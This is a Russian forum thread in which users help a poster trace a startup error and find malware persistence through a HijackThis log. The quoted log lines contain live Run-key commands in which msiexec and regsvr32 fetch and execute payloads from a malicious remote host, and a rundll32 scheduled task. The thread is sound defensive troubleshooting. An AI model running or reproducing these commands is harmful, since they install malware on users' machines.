Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Не удаётся найти "C:\...\Temp\ups.exe"

Модерирует : KLASS, IFkO

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
‘Не удаётся найти "C:\...\Temp\ups.exe". Проверьте, правильно ли указано имя и повторите попытку’ Эта ошибка появляется каждый раз после запуска компьютера, уже несколько дней. Я проверял, того файла действительно нет. Как устранить это?

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 06:19 16-04-2020
RetroRocket



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
Цитата:
файла действительно нет. Как устранить это?
Очевидно, удалить ссылку из автозагрузки.
Пуск - Выполнить - msconfig - Автозагрузка - находите там ups.exe и снимаете галку.
Более сложный способ - скачиваете AVZ, выбираете меню Сервис - Менеджер автозапуска, в списке находите ups.exe и удаляете.
Для облегчения поиска удобнее нажать в правом верхнем углу кнопку с молнией ("Исключить файлы, известные AVZ как системные и безопасные").

----------
"... Зовёт, зовёт в дорогу далёкий Млечный Путь ..."

Всего записей: 2937 | Зарегистр. 02-01-2018 | Отправлено: 09:08 16-04-2020 | Исправлено: RetroRocket, 09:08 16-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Нет этого файла, и там, и там

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 09:45 16-04-2020
RetroRocket



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
Цитата:
Нет этого файла, и там, и там
Странно.  
Попробуйте в AVZ Сервис - Поиск данных в реестре - ups.exe
 
Добавлено:
Если не найдёт, тогда пробуйте Файл - Отложенное удаление файла, указываете полный путь к ups.exe из вашего сообщения (без многоточия), в окне "Режим удаления" отмечаете "Удаление файлов и эвристическая чистка ссылок на них в системе".

----------
"... Зовёт, зовёт в дорогу далёкий Млечный Путь ..."

Всего записей: 2937 | Зарегистр. 02-01-2018 | Отправлено: 10:00 16-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Опять не помогло
https://cloud.mail.ru/public/3vcp/2b8ebrYjd  

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 11:42 16-04-2020
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
Скачать, запустить, показать лог  
https://www.bleepingcomputer.com/download/hijackthis/
Или отсюда
HijackThis / HijackThis Fork

Всего записей: 16396 | Зарегистр. 20-09-2014 | Отправлено: 11:51 16-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Mavrikii
https://cloud.mail.ru/public/KQ7b/29mwBd43D

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 12:40 16-04-2020
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
Malware (грузит дерьмо с сайта)

Цитата:
O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q  
O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll

И посмотреть что в O4 - User Startup: C:\Users\ANO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat
Плюс фигня в виде O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Читать тут - Анонимный вход

Всего записей: 16396 | Зарегистр. 20-09-2014 | Отправлено: 13:01 16-04-2020 | Исправлено: Mavrikii, 13:13 16-04-2020
RetroRocket



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
В логе ещё и webalta есть. Даже не знаю, где в 2020 году можно это подцепить.
От майл.ру полный комплект мусора (поиск, спутник, гуард).
И вишенкой на торте - Browser Manager от яндекса.
Советую проверить систему - Вирус(ы) в ОС Windows. Проблемы. Решения..

----------
"... Зовёт, зовёт в дорогу далёкий Млечный Путь ..."

Всего записей: 2937 | Зарегистр. 02-01-2018 | Отправлено: 13:36 16-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
RetroRocket
Два дня проверял - вирусов не было
 
Добавлено:
Mavrikii
я ничего не понял. извмните

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 13:54 16-04-2020
RetroRocket



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
Цитата:
Два дня проверял - вирусов не было
Ваш лог говорит о наличии вредоносного мусора.
В автозагрузке системы нужно найти и удалить строки, которые указал Mavrikii.
Если самому сложно разобраться, то лучше переустановить систему начисто и накатить обновления безопасности.

----------
"... Зовёт, зовёт в дорогу далёкий Млечный Путь ..."

Всего записей: 2937 | Зарегистр. 02-01-2018 | Отправлено: 14:08 16-04-2020
Bersaglio



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
я ничего не понял. извмните

Тут понимать нечего. И извмнять, как вы изволили выразиться, тоже. Надо систему переустанавливать, вирусы въелись в неё настолько, что её уже не спасти. Переустанавливайте систему начисто, ставьте нормальный антивирус (из бесплатных - KFA 20, например) и ежедневно сканируйте систему при помощи MBAM и Adwcleaner.

Всего записей: 4611 | Зарегистр. 21-08-2006 | Отправлено: 15:01 16-04-2020
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05

Цитата:
я ничего не понял. извмните

Как минимум - удалить указанные строки (эта же программа позволяет их отметить и удалить) и проверять, что не появляются снова и будет ли то сообщение после ребута. Иначе искать вирусы/руткиты и не единственным инструментом.

Всего записей: 16396 | Зарегистр. 20-09-2014 | Отправлено: 18:23 16-04-2020 | Исправлено: Mavrikii, 20:06 16-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Всем спасибо
 
Добавлено:

Цитата:
[
O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q  
O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
 
И посмотреть что в O4 - User Startup: C:\Users\ANO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat
Плюс фигня в виде O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
 

мне удалить все 4 строки?

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 03:02 17-04-2020
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
да, хотя в .bat лучше глянуть содержимое

Всего записей: 16396 | Зарегистр. 20-09-2014 | Отправлено: 04:08 17-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
хотя в .bat лучше глянуть содержимое

@echo off
IF EXIST "%appdata%\..\Local\ZenMate\Update.exe" (
"%appdata%\..\Local\ZenMate\Update.exe" --processStart ZenMate.exe
) ELSE (
(goto) 2>nul & del "%~f0"
)
 

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 07:28 17-04-2020
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AN05
вполне возможно от ZenMate VPN. если пользовались самостоятельно - можно оставить.

Всего записей: 16396 | Зарегистр. 20-09-2014 | Отправлено: 07:40 17-04-2020
AN05

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Теперь все нормально, спасибо!

Всего записей: 30 | Зарегистр. 20-05-2017 | Отправлено: 08:13 17-04-2020
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Не удаётся найти "C:\...\Temp\ups.exe"


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2025

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru